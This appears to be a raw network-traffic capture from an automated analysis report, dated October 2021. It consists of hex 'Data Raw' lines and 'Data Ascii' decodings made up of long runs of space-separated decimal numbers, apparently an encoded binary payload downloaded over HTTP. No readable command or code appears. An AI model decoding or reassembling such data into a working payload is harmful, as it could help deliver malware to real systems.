                    2021-10-26 16:59:38 UTC1811INData Raw: 20 32 20 35 36 20 35 30 20 31 20 38 34 20 31 31 34 20 31 31 37 20 31 31 20 31 31 32 20 35 30 20 33 33 20 34 39 20 35 30 20 31 32 34 20 35 35 20 31 31 37 20 31 30 39 20 31 31 38 20 34 33 20 32 39 20 32 31 20 31 36 20 34 32 20 34 39 20 31 31 37 20 31 30 39 20 31 31 36 20 33 37 20 34 30 20 34 33 20 34 36 20 32 31 37 20 30 20 31 31 37 20 31 30 39 20 31 31 33 20 34 33 20 32 39 20 34 32 20 31 36 20 38 33 20 31 30 30 20 31 31 39 20 32 32 35 20 35 36 20 35 30 20 34 38 20 35 31 20 31 34 38 20 38 33 20 31 30 31 20 31 31 35 20 32 30 37 20 31 31 39 20 32 36 20 31 33 34 20 35 30 20 35 34 20 38 32 20 38 38 20 31 32 37 20 37 30 20 31 36 37 20 35 37 20 32 37 20 32 31 32 20 35 34 20 37 31 20 36 36 20 31 32 35 20 31 30 39 20 37 32 20 35 30 20 34 38 20 35 30 20 33 37 20 38
                    Data Ascii: 2 56 50 1 84 114 117 11 112 50 33 49 50 124 55 117 109 118 43 29 21 16 42 49 117 109 116 37 40 43 46 217 0 117 109 113 43 29 42 16 83 100 119 225 56 50 48 51 148 83 101 115 207 119 26 134 50 54 82 88 127 70 167 57 27 212 54 71 66 125 109 72 50 48 50 37 8
                    2021-10-26 16:59:38 UTC1815INData Raw: 31 31 36 20 31 31 34 20 31 31 37 20 31 31 31 20 38 38 20 31 31 36 20 34 38 20 35 30 20 36 30 20 31 32 34 20 31 34 39 20 31 31 37 20 31 30 39 20 31 31 38 20 32 32 36 20 34 34 20 35 30 20 35 34 20 38 36 20 39 30 20 35 31 20 31 30 39 20 31 31 32 20 35 36 20 32 34 20 32 31 33 20 35 34 20 38 34 20 31 31 36 20 31 36 35 20 31 31 39 20 31 31 32 20 35 30 20 35 30 20 32 36 20 31 31 32 20 38 34 20 31 31 34 20 31 32 37 20 36 39 20 31 35 31 20 35 30 20 34 38 20 35 32 20 33 30 20 31 36 32 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 31 39 34 20 34 38 20 35 30 20 34 38 20 31 32 34 20 31 35 37 20 31 31 37 20 31 30 39 20 31 31 38 20 38 33 20 32 34 20 32 32 30 20 35 34 20 38 34 20 31 31 36 20 39 35 20 31 30 39 20 31 31 32 20 34 39 20 30 20 35 36 20 35 34 20 31 31 39 20
                    Data Ascii: 116 114 117 111 88 116 48 50 60 124 149 117 109 118 226 44 50 54 86 90 51 109 112 56 24 213 54 84 116 165 119 112 50 50 26 112 84 114 127 69 151 50 48 52 30 162 114 117 107 88 194 48 50 48 124 157 117 109 118 83 24 220 54 84 116 95 109 112 49 0 56 54 119
                    2021-10-26 16:59:38 UTC1819INData Raw: 31 34 20 31 31 37 20 31 30 39 20 31 31 34 20 32 36 20 31 31 33 20 35 30 20 35 34 20 39 34 20 31 31 32 20 31 31 38 20 31 31 33 20 39 33 20 34 39 20 32 32 20 32 30 20 32 38 20 34 31 20 34 32 20 31 31 37 20 31 30 39 20 31 31 36 20 32 35 20 32 30 30 20 35 30 20 35 34 20 38 34 20 31 31 33 20 36 39 20 31 30 33 20 31 31 32 20 32 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 34 20 34 33 20 34 36 20 33 31 20 34 36 20 31 31 34 20 39 20 34 35 20 31 30 39 20 31 31 32 20 35 34 20 35 31 20 34 31 20 34 35 20 31 32 31 20 39 38 20 38 33 20 31 30 35 20 31 30 38 20 34 30 20 32 39 20 36 33 20 31 36 20 31 32 34 20 31 39 33 20 31 31 37 20 31 30 39 20 31 31 38 20 32 34 20 32 32 20 32 35 20 32 30 38 20 31 31 34 20 38 39 20 31 35 35 20 37 35
                    Data Ascii: 14 117 109 114 26 113 50 54 94 112 118 113 93 49 22 20 28 41 42 117 109 116 25 200 50 54 84 113 69 103 112 20 48 50 54 84 114 117 109 114 43 46 31 46 114 9 45 109 112 54 51 41 45 121 98 83 105 108 40 29 63 16 124 193 117 109 118 24 22 25 208 114 89 155 75
                    2021-10-26 16:59:38 UTC1824INData Raw: 34 36 20 31 34 33 20 36 31 20 31 31 31 20 31 38 20 31 37 38 20 37 38 20 31 31 34 20 31 31 37 20 31 32 20 32 34 30 20 31 31 31 20 34 38 20 35 30 20 35 30 20 34 32 20 31 39 20 31 31 37 20 31 30 39 20 31 31 36 20 34 35 20 31 39 33 20 38 34 20 38 33 20 35 30 20 32 30 20 31 36 20 31 31 20 32 31 20 38 34 20 38 35 20 31 30 39 20 32 37 20 37 30 20 38 32 20 32 30 37 20 31 39 38 20 31 31 32 20 35 30 20 31 37 36 20 31 31 31 20 35 34 20 38 34 20 31 31 38 20 39 34 20 31 30 37 20 31 34 20 31 30 39 20 34 38 20 35 30 20 35 30 20 39 35 20 31 32 20 34 30 20 31 30 39 20 31 31 32 20 35 34 20 31 36 20 31 33 36 20 31 35 37 20 38 34 20 31 31 34 20 37 30 20 37 31 20 31 30 35 20 31 39 31 20 31 39 20 35 30 20 35 34 20 38 35 20 39 37 20 31 32 33 20 31 32 34 20 31 32 36 20 33 36 20
                    Data Ascii: 46 143 61 111 18 178 78 114 117 12 240 111 48 50 50 42 19 117 109 116 45 193 84 83 50 20 16 11 21 84 85 109 27 70 82 207 198 112 50 176 111 54 84 118 94 107 14 109 48 50 50 95 12 40 109 112 54 16 136 157 84 114 70 71 105 191 19 50 54 85 97 123 124 126 36
                    2021-10-26 16:59:38 UTC1828INData Raw: 20 35 30 20 38 39 20 38 34 20 31 31 34 20 31 30 30 20 31 31 31 20 31 31 20 38 30 20 34 38 20 35 30 20 35 30 20 37 38 20 39 35 20 31 32 30 20 37 35 20 31 31 34 20 33 38 20 33 38 20 33 30 20 36 30 20 31 31 34 20 38 34 20 31 31 35 20 36 35 20 39 38 20 32 35 20 35 38 20 35 36 20 32 39 20 31 36 35 20 31 35 20 32 33 20 31 30 39 20 31 31 32 20 35 34 20 32 37 20 31 39 35 20 34 38 20 35 39 20 31 31 20 31 31 37 20 31 30 39 20 31 32 32 20 34 38 20 33 36 20 34 37 20 32 37 20 38 37 20 38 34 20 38 33 20 37 31 20 31 33 20 38 31 20 34 38 20 35 30 20 35 30 20 31 32 37 20 31 33 38 20 31 31 37 20 31 30 39 20 31 31 32 20 33 33 20 30 20 35 32 20 35 34 20 34 39 20 31 31 34 20 31 31 37 20 31 30 39 20 30 20 35 30 20 34 38 20 33 35 20 35 33 20 36 36 20 39 33 20 31 31 35 20 33 30
                    Data Ascii: 50 89 84 114 100 111 11 80 48 50 50 78 95 120 75 114 38 38 30 60 114 84 115 65 98 25 58 56 29 165 15 23 109 112 54 27 195 48 59 11 117 109 122 48 36 47 27 87 84 83 71 13 81 48 50 50 127 138 117 109 112 33 0 52 54 49 114 117 109 0 50 48 35 53 66 93 115 30
                    2021-10-26 16:59:38 UTC1832INData Raw: 20 32 39 20 34 20 31 30 38 20 31 31 32 20 35 32 20 35 34 20 33 38 20 32 30 30 20 38 32 20 32 32 33 20 31 31 37 20 31 30 39 20 31 31 38 20 36 35 20 32 34 31 20 35 31 20 35 34 20 38 32 20 32 39 20 32 34 20 31 30 38 20 31 31 32 20 35 32 20 35 34 20 33 38 20 32 30 30 20 38 32 20 32 32 31 20 31 31 37 20 31 30 39 20 31 31 38 20 36 35 20 32 34 39 20 35 31 20 35 34 20 38 32 20 32 39 20 31 32 20 31 30 38 20 31 31 32 20 35 32 20 35 34 20 32 36 20 31 36 39 20 38 34 20 31 31 34 20 31 31 35 20 36 39 20 37 30 20 35 31 20 34 38 20 35 32 20 38 39 20 31 39 35 20 31 31 35 20 31 31 37 20 31 30 37 20 39 30 20 34 39 20 30 20 35 39 20 35 34 20 36 39 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 33 30 20 31 31 39 20 31 31 35 20 31 31 37 20 31 30
                    Data Ascii: 29 4 108 112 52 54 38 200 82 223 117 109 118 65 241 51 54 82 29 24 108 112 52 54 38 200 82 221 117 109 118 65 249 51 54 82 29 12 108 112 52 54 26 169 84 114 115 69 70 51 48 52 89 195 115 117 107 90 49 0 59 54 69 114 117 109 112 50 48 50 30 119 115 117 10
                    2021-10-26 16:59:38 UTC1835INData Raw: 20 38 32 20 32 20 37 31 20 31 36 30 20 34 34 20 32 34 20 32 30 35 20 35 34 20 38 34 20 31 31 36 20 32 31 35 20 31 30 37 20 31 31 31 20 33 38 20 31 36 20 38 33 20 32 38 20 31 33 32 20 31 30 38 20 39 33 20 31 34 36 20 31 31 32 20 35 30 20 35 34 20 31 34 34 20 34 38 20 37 35 20 31 30 33 20 38 35 20 36 20 39 30 20 32 32 36 20 34 36 20 32 36 20 32 30 31 20 38 34 20 31 31 34 20 31 31 35 20 32 30 37 20 31 31 38 20 34 35 20 33 38 20 31 38 20 33 35 20 31 32 36 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38 20 35 32 20 31 34 38 20 38 32 20 32 34 32 20 32 34 20 31 30 39 20 31 31 32 20 35 34 20 32 36 20 35 36 20 31 34 20 31 36 37 20 31 34 33 20 31 33 38 20 31 34 36 20 32 34 30 20 38 39 20 34 38 20 35 30 20 35 30 20 31 30 38 20 37 37 20 31 33 39 20 31
                    Data Ascii: 82 2 71 160 44 24 205 54 84 116 215 107 111 38 16 83 28 132 108 93 146 112 50 54 144 48 75 103 85 6 90 226 46 26 201 84 114 115 207 118 45 38 18 35 126 162 107 69 143 50 48 52 148 82 242 24 109 112 54 26 56 14 167 143 138 146 240 89 48 50 50 108 77 139 1
                    2021-10-26 16:59:38 UTC1839INData Raw: 20 39 33 20 34 33 20 31 31 32 20 35 30 20 35 38 20 34 32 20 38 39 20 35 37 20 31 31 35 20 31 31 37 20 31 30 33 20 31 34 20 36 38 20 34 38 20 35 30 20 35 30 20 31 33 32 20 38 31 20 31 31 37 20 31 30 39 20 31 31 33 20 32 36 20 31 31 38 20 35 30 20 35 34 20 39 34 20 31 30 37 20 32 36 20 30 20 31 31 33 20 35 30 20 35 38 20 37 36 20 36 34 20 38 34 20 31 31 34 20 31 31 33 20 31 38 39 20 31 31 30 20 35 30 20 34 38 20 34 31 20 33 30 20 31 38 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 36 20 39 33 20 39 33 20 35 31 20 35 34 20 39 34 20 31 32 20 33 20 31 30 39 20 31 31 32 20 35 34 20 32 32 34 20 31 20 35 34 20 38 34 20 31 31 35 20 39 33 20 34 33 20 31 31 32 20 35 30 20 35 38 20 34 31 20 38 39 20 35 37 20 31 31 35 20 31 31 37 20 31 30 33 20 31 34 20 36 38 20 34 38
                    Data Ascii: 93 43 112 50 58 42 89 57 115 117 103 14 68 48 50 50 132 81 117 109 113 26 118 50 54 94 107 26 0 113 50 58 76 64 84 114 113 189 110 50 48 41 30 18 114 117 103 106 93 93 51 54 94 12 3 109 112 54 224 1 54 84 115 93 43 112 50 58 41 89 57 115 117 103 14 68 48
                    2021-10-26 16:59:38 UTC1843INData Raw: 37 20 31 30 30 20 31 31 34 20 35 30 20 34 38 20 37 36 20 36 39 20 38 34 20 31 31 34 20 31 31 33 20 39 39 20 31 31 36 20 33 35 20 35 33 20 31 36 38 20 37 39 20 33 31 20 31 31 34 20 31 31 37 20 31 30 38 20 31 20 31 32 31 20 34 38 20 35 30 20 35 35 20 35 39 20 32 34 32 20 31 31 36 20 31 30 39 20 31 32 32 20 31 30 20 32 31 39 20 35 31 20 35 34 20 38 34 20 31 32 20 36 20 31 30 39 20 31 31 32 20 35 34 20 36 32 20 35 34 20 33 39 20 38 31 20 32 33 32 20 31 32 20 31 39 36 20 31 31 32 20 35 30 20 34 39 20 36 37 20 31 35 39 20 38 34 20 31 31 34 20 31 31 36 20 32 20 32 34 31 20 35 31 20 34 38 20 35 36 20 31 34 20 31 35 33 20 31 31 35 20 31 31 37 20 31 30 39 20 31 34 20 36 35 20 34 38 20 35 30 20 35 30 20 39 30 20 31 31 38 20 31 30 30 20 31 30 34 20 32 33 34 20 37 30
                    Data Ascii: 7 100 114 50 48 76 69 84 114 113 99 116 35 53 168 79 31 114 117 108 1 121 48 50 55 59 242 116 109 122 10 219 51 54 84 12 6 109 112 54 62 54 39 81 232 12 196 112 50 49 67 159 84 114 116 2 241 51 48 56 14 153 115 117 109 14 65 48 50 50 90 118 100 104 234 70
                    2021-10-26 16:59:38 UTC1847INData Raw: 20 34 20 31 30 39 20 31 31 32 20 35 34 20 39 35 20 32 35 31 20 35 34 20 38 34 20 31 32 30 20 32 36 20 31 36 37 20 31 31 32 20 35 30 20 35 38 20 39 33 20 31 30 39 20 38 34 20 31 31 34 20 31 32 37 20 38 35 20 32 31 32 20 34 38 20 34 38 20 35 30 20 37 32 20 33 33 20 31 31 34 20 31 31 37 20 31 30 35 20 31 34 20 36 37 20 34 38 20 35 30 20 35 30 20 35 39 20 32 32 35 20 31 31 36 20 31 30 39 20 31 32 32 20 31 39 30 20 31 39 20 35 30 20 35 34 20 38 35 20 32 39 20 34 36 20 31 30 39 20 31 31 32 20 35 36 20 38 20 31 38 30 20 35 32 20 38 34 20 31 31 34 20 31 31 20 32 34 20 31 31 32 20 35 30 20 35 32 20 37 36 20 37 31 20 38 34 20 31 31 34 20 31 31 33 20 32 20 32 32 38 20 35 31 20 34 38 20 35 36 20 38 39 20 31 39 33 20 31 31 35 20 31 31 37 20 31 30 33 20 33 31 20 31 30
                    Data Ascii: 4 109 112 54 95 251 54 84 120 26 167 112 50 58 93 109 84 114 127 85 212 48 48 50 72 33 114 117 105 14 67 48 50 50 59 225 116 109 122 190 19 50 54 85 29 46 109 112 56 8 180 52 84 114 11 24 112 50 52 76 71 84 114 113 2 228 51 48 56 89 193 115 117 103 31 10
                    2021-10-26 16:59:38 UTC1851INData Raw: 33 35 20 34 38 20 35 39 20 32 31 39 20 31 31 36 20 31 30 39 20 31 32 32 20 33 30 20 36 33 20 35 33 20 33 39 20 38 30 20 36 20 31 30 30 20 31 30 39 20 31 31 32 20 35 31 20 37 37 20 34 33 20 35 34 20 38 34 20 31 31 38 20 39 34 20 37 37 20 31 36 30 20 36 31 20 34 38 20 35 30 20 35 35 20 31 32 34 20 35 32 20 31 31 37 20 31 30 39 20 31 32 32 20 33 35 20 35 34 20 39 33 20 31 35 39 20 38 35 20 31 31 34 20 31 32 37 20 36 35 20 31 32 35 20 35 33 20 33 33 20 35 34 20 36 36 20 39 31 20 31 31 34 20 31 31 37 20 31 30 38 20 31 33 20 34 30 20 34 38 20 35 30 20 35 30 20 36 39 20 31 32 30 20 39 38 20 35 33 20 39 39 20 35 36 20 33 33 20 35 36 20 33 39 20 39 35 20 32 35 32 20 31 39 34 20 39 35 20 32 34 37 20 31 38 20 32 30 33 20 33 30 20 32 33 30 20 37 34 20 39 30 20 31 33
                    Data Ascii: 35 48 59 219 116 109 122 30 63 53 39 80 6 100 109 112 51 77 43 54 84 118 94 77 160 61 48 50 55 124 52 117 109 122 35 54 93 159 85 114 127 65 125 53 33 54 66 91 114 117 108 13 40 48 50 50 69 120 98 53 99 56 33 56 39 95 252 194 95 247 18 203 30 230 74 90 13
                    2021-10-26 16:59:38 UTC1856INData Raw: 20 34 38 20 35 30 20 31 38 36 20 32 34 20 31 31 34 20 31 31 37 20 31 30 38 20 38 38 20 39 37 20 34 39 20 35 30 20 34 38 20 34 35 20 36 32 20 31 31 37 20 31 30 39 20 31 31 33 20 36 37 20 31 32 34 20 35 30 20 35 34 20 38 35 20 38 38 20 31 30 32 20 39 33 20 31 31 34 20 35 30 20 32 30 20 35 30 20 35 34 20 38 34 20 31 32 36 20 31 31 37 20 31 30 39 20 39 37 20 31 38 20 37 36 20 32 38 20 32 33 30 20 37 34 20 39 30 20 31 33 38 20 31 30 39 20 31 31 32 20 35 32 20 31 36 20 32 34 36 20 36 33 20 38 34 20 31 31 34 20 32 34 39 20 33 33 20 31 31 32 20 35 30 20 34 39 20 32 36 20 31 30 31 20 38 35 20 31 31 34 20 31 31 35 20 32 30 20 36 30 20 35 30 20 34 38 20 35 31 20 37 31 20 32 34 20 31 31 34 20 31 31 37 20 31 30 38 20 39 30 20 33 33 20 30 20 34 38 20 35 34 20 31 31 32
                    Data Ascii: 48 50 186 24 114 117 108 88 97 49 50 48 45 62 117 109 113 67 124 50 54 85 88 102 93 114 50 20 50 54 84 126 117 109 97 18 76 28 230 74 90 138 109 112 52 16 246 63 84 114 249 33 112 50 49 26 101 85 114 115 20 60 50 48 51 71 24 114 117 108 90 33 0 48 54 112
                    2021-10-26 16:59:38 UTC1860INData Raw: 20 39 35 20 31 30 36 20 31 30 33 20 31 30 36 20 34 36 20 33 31 20 35 33 20 31 31 34 20 38 39 20 31 31 38 20 31 30 32 20 39 31 20 35 30 20 35 35 20 35 38 20 37 20 31 37 38 20 31 30 31 20 39 35 20 31 32 36 20 36 34 20 34 39 20 34 38 20 31 31 35 20 35 34 20 38 34 20 31 31 34 20 32 35 35 20 31 30 39 20 31 31 32 20 33 35 20 35 30 20 32 36 20 31 30 36 20 38 35 20 31 31 34 20 31 31 35 20 31 31 39 20 39 33 20 33 34 20 32 32 20 35 33 20 38 39 20 35 35 20 31 31 35 20 31 31 37 20 31 30 33 20 38 30 20 35 30 20 33 32 20 35 30 20 35 34 20 31 30 31 20 39 30 20 39 34 20 31 31 30 20 31 32 33 20 32 35 20 32 32 32 20 35 33 20 32 32 20 31 36 39 20 31 32 35 20 31 31 37 20 31 30 39 20 33 31 20 31 34 31 20 34 39 20 35 30 20 36 30 20 31 31 36 20 31 38 36 20 36 39 20 31 38 39 20
                    Data Ascii: 95 106 103 106 46 31 53 114 89 118 102 91 50 55 58 7 178 101 95 126 64 49 48 115 54 84 114 255 109 112 35 50 26 106 85 114 115 119 93 34 22 53 89 55 115 117 103 80 50 32 50 54 101 90 94 110 123 25 222 53 22 169 125 117 109 31 141 49 50 60 116 186 69 189
                    2021-10-26 16:59:38 UTC1864INData Raw: 20 31 31 34 20 38 38 20 38 20 32 34 39 20 31 31 32 20 35 30 20 35 32 20 32 35 20 32 30 36 20 38 34 20 31 31 33 20 36 39 20 31 30 30 20 31 31 32 20 34 35 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 34 20 34 38 20 37 35 20 31 36 36 20 35 34 20 38 34 20 31 31 38 20 31 31 38 20 36 39 20 32 34 36 20 35 30 20 34 38 20 35 36 20 36 36 20 31 30 36 20 31 31 34 20 31 31 37 20 31 31 31 20 31 30 31 20 33 31 20 35 31 20 32 30 20 31 36 20 31 32 36 20 31 35 20 32 32 35 20 31 30 39 20 31 31 32 20 35 34 20 32 37 20 32 30 32 20 35 34 20 38 37 20 36 36 20 31 32 34 20 31 30 39 20 31 31 31 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 34 20 37 33 20 31 36 35 20 35 30 20 35 34 20 38 30 20 31 31 33
                    Data Ascii: 114 88 8 249 112 50 52 25 206 84 113 69 100 112 45 48 50 54 84 114 117 109 114 48 75 166 54 84 118 118 69 246 50 48 56 66 106 114 117 111 101 31 51 20 16 126 15 225 109 112 54 27 202 54 87 66 124 109 111 50 48 50 54 84 114 117 111 114 73 165 50 54 80 113
                    2021-10-26 16:59:38 UTC1867INData Raw: 20 31 32 32 20 31 30 38 20 33 31 20 35 35 20 32 30 20 37 37 20 32 30 33 20 31 31 34 20 31 31 37 20 31 30 35 20 39 30 20 32 30 20 32 37 20 31 39 37 20 35 34 20 38 37 20 36 36 20 31 32 34 20 31 30 39 20 31 32 37 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 35 20 33 37 20 32 39 20 34 39 20 31 36 20 31 31 34 20 38 38 20 38 20 32 34 32 20 31 31 32 20 35 30 20 35 32 20 32 35 20 32 30 36 20 38 34 20 39 37 20 36 39 20 31 31 30 20 31 31 32 20 36 31 20 34 38 20 35 30 20 35 34 20 38 38 20 31 31 34 20 31 31 37 20 31 32 34 20 31 31 34 20 34 31 20 33 39 20 33 31 20 34 39 20 31 31 34 20 39 20 32 31 33 20 31 30 39 20 31 31 32 20 35 34 20 32 36 20 32 30 20 32 39 20 31 36 33 20 31 31 34 20 31 31 38 20 39 33 20 31 32 31 20 35 30
                    Data Ascii: 122 108 31 55 20 77 203 114 117 105 90 20 27 197 54 87 66 124 109 127 50 48 50 54 84 114 117 111 115 37 29 49 16 114 88 8 242 112 50 52 25 206 84 97 69 110 112 61 48 50 54 88 114 117 124 114 41 39 31 49 114 9 213 109 112 54 26 20 29 163 114 118 93 121 50
                    2021-10-26 16:59:38 UTC1871INData Raw: 31 39 30 20 31 33 33 20 34 20 31 38 31 20 31 31 36 20 32 35 31 20 32 31 38 20 31 30 32 20 31 20 34 32 20 34 39 20 33 30 20 31 33 31 20 31 31 35 20 31 31 37 20 31 30 33 20 33 31 20 32 33 34 20 34 39 20 35 30 20 36 30 20 39 34 20 38 39 20 31 32 31 20 31 31 30 20 38 38 20 32 32 39 20 34 39 20 35 30 20 36 30 20 35 39 20 31 37 30 20 31 31 36 20 31 30 39 20 31 32 32 20 35 36 20 35 30 20 34 39 20 35 30 20 38 32 20 32 39 20 32 33 36 20 31 30 38 20 31 31 32 20 35 32 20 32 33 38 20 32 37 20 31 39 20 31 32 34 20 36 32 20 31 31 37 20 31 30 39 20 31 32 32 20 36 32 20 35 30 20 37 33 20 31 37 33 20 38 34 20 31 31 34 20 31 31 33 20 31 32 36 20 31 31 37 20 33 35 20 35 33 20 33 30 20 36 33 20 36 39 20 31 31 39 20 31 31 39 20 31 30 31 20 33 31 20 32 35 34 20 34 39 20 35 30
                    Data Ascii: 190 133 4 181 116 251 218 102 1 42 49 30 131 115 117 103 31 234 49 50 60 94 89 121 110 88 229 49 50 60 59 170 116 109 122 56 50 49 50 82 29 236 108 112 52 238 27 19 124 62 117 109 122 62 50 73 173 84 114 113 126 117 35 53 30 63 69 119 119 101 31 254 49 50
                    2021-10-26 16:59:38 UTC1875INData Raw: 33 35 20 31 20 31 36 20 36 37 20 31 31 30 20 38 38 20 39 38 20 38 36 20 34 38 20 37 35 20 31 37 31 20 35 34 20 38 34 20 31 31 38 20 31 30 32 20 31 30 34 20 39 37 20 35 35 20 32 38 20 33 39 20 32 39 20 38 37 20 31 32 30 20 39 34 20 31 33 30 20 39 37 20 35 35 20 35 30 20 34 38 20 37 37 20 32 32 35 20 31 31 34 20 31 31 37 20 31 30 35 20 32 35 34 20 31 33 33 20 39 35 20 31 33 31 20 35 35 20 38 34 20 31 31 36 20 31 31 39 20 32 32 20 32 30 32 20 35 30 20 34 38 20 35 34 20 33 37 20 38 32 20 39 39 20 31 31 35 20 36 39 20 32 34 38 20 35 30 20 34 38 20 35 36 20 33 39 20 38 32 20 39 30 20 32 35 32 20 31 30 39 20 31 31 32 20 35 36 20 35 30 20 37 33 20 31 34 31 20 38 34 20 31 31 34 20 31 31 33 20 32 20 31 34 39 20 35 31 20 34 38 20 35 36 20 33 32 20 31 30 33 20 36 34
                    Data Ascii: 35 1 16 67 110 88 98 86 48 75 171 54 84 118 102 104 97 55 28 39 29 87 120 94 130 97 55 50 48 77 225 114 117 105 254 133 95 131 55 84 116 119 22 202 50 48 54 37 82 99 115 69 248 50 48 56 39 82 90 252 109 112 56 50 73 141 84 114 113 2 149 51 48 56 32 103 64
                    2021-10-26 16:59:38 UTC1879INData Raw: 20 37 35 20 31 35 39 20 35 34 20 38 34 20 31 31 38 20 31 31 39 20 32 32 20 32 32 33 20 35 30 20 34 38 20 35 34 20 38 39 20 32 30 33 20 31 31 35 20 31 31 37 20 31 30 37 20 39 30 20 34 38 20 34 39 20 33 34 20 35 34 20 38 34 20 31 31 32 20 31 31 37 20 38 34 20 31 31 32 20 34 30 20 39 39 20 35 30 20 34 39 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 39 39 20 32 20 35 32 20 35 30 20 32 32 20 38 35 20 31 31 34 20 31 31 37 20 32 34 30 20 31 31 32 20 35 30 20 33 33 20 34 38 20 38 39 20 32 31 39 20 31 31 35 20 31 31 37 20 31 30 37 20 39 33 20 35 31 20 32 36 20 34 38 20 37 37 20 32 34 33 20 31 31 34 20 31 31 37 20 31 30 35 20 31 30 39 20 33 31 20 31 39 20 32 30 20 35 32 20 34 37 20 32 31 38 20 31 31 37 20 31 30 39 20 31 31 36 20 34 30 20 32 39 20 34 36 20 31 36
                    Data Ascii: 75 159 54 84 118 119 22 223 50 48 54 89 203 115 117 107 90 48 49 34 54 84 112 117 84 112 40 99 50 49 84 114 117 109 99 2 52 50 22 85 114 117 240 112 50 33 48 89 219 115 117 107 93 51 26 48 77 243 114 117 105 109 31 19 20 52 47 218 117 109 116 40 29 46 16
                    2021-10-26 16:59:38 UTC1883INData Raw: 37 20 32 33 32 20 32 30 32 20 38 31 20 32 30 37 20 32 31 31 20 32 30 31 20 31 34 38 20 32 34 39 20 35 36 20 32 31 30 20 32 31 31 20 39 31 20 31 35 39 20 34 20 31 34 39 20 31 37 20 31 32 37 20 32 31 35 20 33 37 20 31 38 20 31 38 39 20 31 35 38 20 31 39 33 20 31 34 32 20 32 31 36 20 31 36 30 20 32 37 20 31 34 32 20 31 38 31 20 31 37 39 20 38 39 20 31 33 35 20 31 39 36 20 32 31 37 20 34 33 20 39 32 20 31 37 39 20 34 31 20 32 33 34 20 33 31 20 32 34 35 20 32 33 34 20 31 34 36 20 31 39 34 20 31 33 34 20 37 36 20 31 37 37 20 37 20 31 32 33 20 31 37 32 20 31 32 33 20 32 33 35 20 32 30 39 20 31 35 38 20 35 33 20 39 30 20 31 31 31 20 37 32 20 32 38 20 32 30 34 20 31 30 39 20 38 20 31 39 20 37 35 20 32 32 31 20 31 30 33 20 35 32 20 31 34 35 20 32 32 34 20 31 34 38
                    Data Ascii: 7 232 202 81 207 211 201 148 249 56 210 211 91 159 4 149 17 127 215 37 18 189 158 193 142 216 160 27 142 181 179 89 135 196 217 43 92 179 41 234 31 245 234 146 194 134 76 177 7 123 172 123 235 209 158 53 90 111 72 28 204 109 8 19 75 221 103 52 145 224 148
                    2021-10-26 16:59:38 UTC1888INData Raw: 31 30 32 20 31 34 20 32 34 20 31 32 33 20 31 33 37 20 32 34 37 20 38 31 20 34 32 20 33 37 20 31 33 34 20 31 35 30 20 31 33 30 20 31 33 37 20 34 38 20 31 39 31 20 31 37 35 20 31 38 33 20 31 38 30 20 32 31 37 20 33 31 20 31 34 38 20 30 20 31 30 36 20 37 39 20 31 38 37 20 31 33 36 20 37 33 20 32 33 39 20 31 37 34 20 37 35 20 31 39 36 20 34 38 20 35 20 31 35 37 20 31 33 35 20 35 36 20 39 37 20 32 33 33 20 31 32 33 20 31 32 31 20 37 36 20 32 39 20 32 30 35 20 32 31 34 20 32 35 30 20 32 31 36 20 34 39 20 38 37 20 33 30 20 32 33 35 20 31 32 38 20 32 32 33 20 33 36 20 31 39 34 20 32 34 32 20 32 30 20 31 38 31 20 31 30 38 20 32 33 32 20 32 35 34 20 33 35 20 39 33 20 31 37 37 20 31 36 32 20 31 38 34 20 31 39 20 32 31 33 20 31 30 20 31 38 31 20 34 37 20 32 35 20 33
                    Data Ascii: 102 14 24 123 137 247 81 42 37 134 150 130 137 48 191 175 183 180 217 31 148 0 106 79 187 136 73 239 174 75 196 48 5 157 135 56 97 233 123 121 76 29 205 214 250 216 49 87 30 235 128 223 36 194 242 20 181 108 232 254 35 93 177 162 184 19 213 10 181 47 25 3
                    2021-10-26 16:59:38 UTC1892INData Raw: 37 20 31 34 37 20 35 32 20 32 34 34 20 37 37 20 32 31 35 20 32 30 39 20 39 34 20 35 30 20 31 32 20 37 32 20 34 34 20 31 37 34 20 39 20 37 36 20 32 30 36 20 39 34 20 31 20 31 35 35 20 31 34 30 20 31 35 34 20 35 31 20 34 36 20 31 35 37 20 32 32 38 20 36 34 20 38 37 20 31 36 32 20 31 33 31 20 35 32 20 31 34 31 20 31 34 37 20 36 32 20 33 31 20 39 32 20 31 38 35 20 36 37 20 31 35 30 20 34 39 20 32 31 30 20 35 33 20 32 31 39 20 34 32 20 34 30 20 31 35 39 20 32 30 31 20 33 37 20 31 39 31 20 31 31 38 20 31 34 33 20 31 34 35 20 32 32 34 20 36 38 20 32 32 39 20 32 33 30 20 39 33 20 31 38 31 20 31 31 38 20 31 34 33 20 31 34 35 20 31 38 35 20 31 39 38 20 31 35 35 20 32 31 36 20 31 36 39 20 31 30 35 20 32 33 33 20 31 31 36 20 31 34 31 20 31 34 39 20 35 36 20 32 31 38
                    Data Ascii: 7 147 52 244 77 215 209 94 50 12 72 44 174 9 76 206 94 1 155 140 154 51 46 157 228 64 87 162 131 52 141 147 62 31 92 185 67 150 49 210 53 219 42 40 159 201 37 191 118 143 145 224 68 229 230 93 181 118 143 145 185 198 155 216 169 105 233 116 141 149 56 218
